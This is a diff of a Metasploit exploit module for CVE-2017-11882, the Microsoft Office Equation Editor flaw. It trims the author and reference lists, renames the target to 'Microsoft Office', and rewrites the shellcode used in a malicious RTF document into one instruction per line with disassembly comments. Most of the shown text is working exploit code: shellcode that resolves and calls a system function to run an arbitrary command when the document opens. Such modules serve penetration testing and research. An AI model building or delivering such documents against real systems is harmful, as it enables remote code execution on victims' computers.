@@ -22,18 +22,17 @@ def initialize(info = {})
2222 a length of 109 bytes to be executed Affects Microsoft Office word for the latest
2323 17 years.
2424 } ,
25- 'Author' => [ 'mumbai' , 'embedi' , 'BlackMathIT' ] ,
25+ 'Author' => [ 'mumbai' , 'embedi' ] ,
2626 'License' => MSF_LICENSE ,
2727 'DisclosureDate' => 'Nov 15 2017' ,
2828 'References' => [
2929 [ 'URL' , 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about' ] ,
30- [ 'URL' , 'https://github.com/embedi/CVE-2017-11882' ] ,
31- [ 'URL' , 'https://github.com/BlackMathIT/2017-11882_Generator/blob/master/2017-11882_Generator.py' ]
30+ [ 'URL' , 'https://github.com/embedi/CVE-2017-11882' ]
3231 ] ,
3332 'Platform' => 'win' ,
3433 'Arch' => [ ARCH_X86 , ARCH_X64 ] ,
3534 'Targets' => [
36- [ 'Microsoft Office Word ' , { } ] ,
35+ [ 'Microsoft Office' , { } ] ,
3736 ] ,
3837 'DefaultTarget' => 0 ,
3938 'Payload' => {
@@ -131,11 +130,43 @@ def generate_rtf
131130 header << "000000000000000000000000000000000000000000000000000000000000000\n "
132131
133132
134- shellcode = "\x1c \x00 \x00 \x00 \x02 \x00 \x9e \xc4 \xa9 \x00 \x00 \x00 \x00 \x00 \x00 \x00 "
135- shellcode << "\xc8 \xa7 \\ \x00 \xc4 \xee [\x00 \x00 \x00 \x00 \x00 \x03 \x01 \x01 \x03 \n \n \x01 \x08 ZZ"
136- shellcode << "\xB8 \x44 \xEB \x71 \x12 \xBA \x78 \x56 \x34 \x12 \x31 \xD0 \x8B \x08 \x8B \x09 \x8B \x09 "
137- shellcode << "\x66 \x83 \xC1 \x3C \x31 \xDB \x53 \x51 \xBE \x64 \x3E \x72 \x12 \x31 \xD6 \xFF \x16 \x53 "
138- shellcode << "\x66 \x83 \xEE \x4C \xFF \x10 \x90 \x90 "
133+ shellcode = "\x1c \x00 " # 0: 1c 00 sbb al,0x0
134+ shellcode << "\x00 \x00 " # 2: 00 00 add BYTE PTR [eax],al
135+ shellcode << "\x02 \x00 " # 4: 02 00 add al,BYTE PTR [eax]
136+ shellcode << "\x9e " # 6: 9e sahf
137+ shellcode << "\xc4 \xa9 \x00 \x00 \x00 \x00 " # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]
138+ shellcode << "\x00 \x00 " # d: 00 00 add BYTE PTR [eax],al
139+ shellcode << "\x00 \xc8 " # f: 00 c8 add al,cl
140+ shellcode << "\xa7 " # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]
141+ shellcode << "\\ " # 12: 5c pop esp
142+ shellcode << "\x00 \xc4 " # 13: 00 c4 add ah,al
143+ shellcode << "\xee " # 15: ee out dx,al
144+ shellcode << "[" # 16: 5b pop ebx
145+ shellcode << "\x00 \x00 " # 17: 00 00 add BYTE PTR [eax],al
146+ shellcode << "\x00 \x00 " # 19: 00 00 add BYTE PTR [eax],al
147+ shellcode << "\x00 \x03 " # 1b: 00 03 add BYTE PTR [ebx],al
148+ shellcode << "\x01 \x01 " # 1d: 01 01 add DWORD PTR [ecx],eax
149+ shellcode << "\x03 \n " # 1f: 03 0a add ecx,DWORD PTR [edx]
150+ shellcode << "\n \x01 " # 21: 0a 01 or al,BYTE PTR [ecx]
151+ shellcode << "\x08 ZZ" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl
152+ shellcode << "\xB8 \x44 \xEB \x71 \x12 " # 26: b8 44 eb 71 12 mov eax,0x1271eb44
153+ shellcode << "\xBA \x78 \x56 \x34 \x12 " # 2b: ba 78 56 34 12 mov edx,0x12345678
154+ shellcode << "\x31 \xD0 " # 30: 31 d0 xor eax,edx
155+ shellcode << "\x8B \x08 " # 32: 8b 08 mov ecx,DWORD PTR [eax]
156+ shellcode << "\x8B \x09 " # 34: 8b 09 mov ecx,DWORD PTR [ecx]
157+ shellcode << "\x8B \x09 " # 36: 8b 09 mov ecx,DWORD PTR [ecx]
158+ shellcode << "\x66 \x83 \xC1 \x3C " # 38: 66 83 c1 3c add cx,0x3c
159+ shellcode << "\x31 \xDB " # 3c: 31 db xor ebx,ebx
160+ shellcode << "\x53 " # 3e: 53 push ebx
161+ shellcode << "\x51 " # 3f: 51 push ecx
162+ shellcode << "\xBE \x64 \x3E \x72 \x12 " # 40: be 64 3e 72 12 mov esi,0x12723e64
163+ shellcode << "\x31 \xD6 " # 45: 31 d6 xor esi,edx
164+ shellcode << "\xFF \x16 " # 47: ff 16 call DWORD PTR [esi]
165+ shellcode << "\x53 " # 49: 53 push ebx
166+ shellcode << "\x66 \x83 \xEE \x4C " # 4a: 66 83 ee 4c sub si,0x4c
167+ shellcode << "\xFF \x10 " # 4e: ff 10 call DWORD PTR [eax]
168+ shellcode << "\x90 " # 50: 90 nop
169+ shellcode << "\x90 " # 50: 90 nop
139170
140171 footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
141172 footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
0 commit comments